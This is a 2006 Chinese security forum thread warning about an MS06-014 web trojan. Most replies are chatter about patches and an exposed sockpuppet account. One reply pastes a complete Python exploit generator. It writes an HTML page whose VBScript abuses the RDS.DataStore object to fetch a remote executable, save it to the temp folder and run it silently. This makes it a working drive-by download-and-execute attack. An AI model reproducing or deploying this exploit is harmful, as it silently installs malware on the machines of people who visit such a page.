首页
社区
课程
招聘
[注意]当心ms06-014网页木马
发表于: 2006-7-26 00:19 13480

[注意]当心ms06-014网页木马

2006-7-26 00:19
13480
收藏
免费 0
支持
分享
最新回复 (50)
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
26
晕,好像没有2000的这个补丁阿

2000的这个kb911562
在哪里有下?
2006-7-27 10:42
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
27
真没想到是这样子的,此人人品有待提高。
2006-7-27 11:09
0
雪    币: 214
活跃值: (40)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
28
#!/bin/sh -
"exec" "python" "-O" "$0" "$@"

__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVS-2006-0003
MS06-014

April 2006

*** this is a bit out-dated, but works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html

Now upload index.html to the same webserver hosting your
http://omfg.what.ho.st/~user/stage2.exe

                            - redsand@blacksecurity.org
"""

__version__ = "1.0"

import sys, random

class MS06014:
   
    __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"

    __html = """
    <title></title>
    <head></head>

    <body>

    <script language="VBScript">

    on error resume next

    BL4CK_PAYLOAD

    </script>
    <head>
    <title>[BL4CK] || 404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    pwn3d!!
    <hr>
    <!-- <script>location.href='http://google.com'</script> -->
    </body>

    </html>

    """

    __payload = """

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "URLFILE"

    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1

    ' xml ajax req
    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' Get temp directory and create our destination name
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    ' open adodb stream and write contents of request to file
    ' like vbs dl+exec code
    S.write x.responseBody
    ' Saves it with CreateOverwrite flag
    S.savetofile fname1,2

    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

    """

    def        __init__(self, file):

        self.__file = file

    def bl4ck(self):
        self.__payload = self.__payload.replace("URLFILE",self.__file)

        encoded = self.__payload

        ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

        return ret

if __name__ == '__main__':

        url=False
        out=False

        print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
        print "url path to file must be on the same domain as the htm file"
        print "http://blacksecurity.org\r\n"

        argc = len(sys.argv)
        if(argc <= 2):
                print "USAGE: %s <download url> <outfile>" % sys.argv[0]
                sys.exit(0)
        if(argc > 1):
                       url = sys.argv[1]
        if(argc > 2):
                out = sys.argv[2]

        ms = MS06014(url)

               ret = ms.bl4ck()

        try:
            fsock = open(out, "w+", 0)
            try:
                fsock.write(ret );
            finally:
                fsock.close()
        except IOError:
            pass

        print "Wrote %r bytes to: %s" % (len(ret),out)

# milw0rm.com [2006-07-21]

既然开了个头,为什么不把代码贴出来呢
2006-7-27 12:37
0
雪    币: 254
活跃值: (126)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
29
我要拜师学习马甲鉴别技术
2006-7-27 13:33
0
雪    币: 898
活跃值: (4039)
能力值: ( LV9,RANK:3410 )
在线值:
发帖
回帖
粉丝
30
据q3说xiaoxinxin是FBI的  
2006-7-27 13:35
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
xiaoxinxin

支持你的举报
2006-7-27 14:12
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
32
晕,竟然挖出一个马甲,我佩服

潜水多年,今天开始不潜水了,改过自新,重新灌水!
2006-7-27 15:44
0
雪    币: 256
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
33
丢人不说,马甲也丢了.何必跳出来呢,自讨没趣的说
2006-7-27 17:41
0
雪    币: 223
活跃值: (25)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
34
江湖啊
2006-7-27 21:06
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
谢谢提醒,当心了!
2006-7-27 22:20
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
呵呵  这个东西华夏就流传出来了  

楼主给个火狐邀请码吧  
reski#163.com  先谢了
2006-7-28 01:42
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
37
哎,无话可说。。

不过还是感谢提供。
2006-7-28 03:50
0
雪    币: 277
活跃值: (312)
能力值: ( LV9,RANK:330 )
在线值:
发帖
回帖
粉丝
38
强烈鄙视散播别人做的木马的,没技术含量。
2006-7-28 07:47
0
雪    币: 239
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
最初由 fly 发布
据q3说xiaoxinxin是FBI的

FBI现在啊招人?
2006-7-28 09:09
0
雪    币: 257
活跃值: (56)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
40
最初由 dINO 发布
FBI现在啊招人?


苏州?
2006-7-29 10:42
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
41
LZ的“杰作”不少!
2006-9-19 01:01
0
雪    币: 427
活跃值: (412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
42
第二个骨头C
2006-9-19 21:03
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
有钱能使  磨推鬼
2006-9-19 22:02
0
雪    币: 440
活跃值: (707)
能力值: ( LV9,RANK:690 )
在线值:
发帖
回帖
粉丝
44
最初由 冰雪黑鹰 发布
晕,竟然挖出一个马甲,我佩服

潜水多年,今天开始不潜水了,改过自新,重新灌水!


兄弟,来了啊!多灌水。
2006-9-19 23:02
0
雪    币: 158
活跃值: (43)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
45
楼主在论坛中也算是一个活跃的人,出自一番好意..
2006-9-19 23:38
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
最初由 modi 发布
楼主在论坛中也算是一个活跃的人,出自一番好意..


敬佩一下。。。。
2006-9-23 14:03
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
47
主要是是微软的错 做出那么多IE漏洞```被人利用 不过微软官方网站也存在漏洞
2006-9-23 18:32
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
48
感谢楼主的提醒啊
2006-9-24 12:39
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
路过的。。。。。。。。。。。
我是怕了网页木马啊, 特别是一些难杀的,搞的我要重装系统,真讨厌哦, 我菜鸟。。。。。。。。。。。。。。一个
2006-9-24 14:38
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
50
看来是少说话,多潜水才好.
失望。
2006-9-24 17:29
0
游客
登录 | 注册 方可回帖
返回
//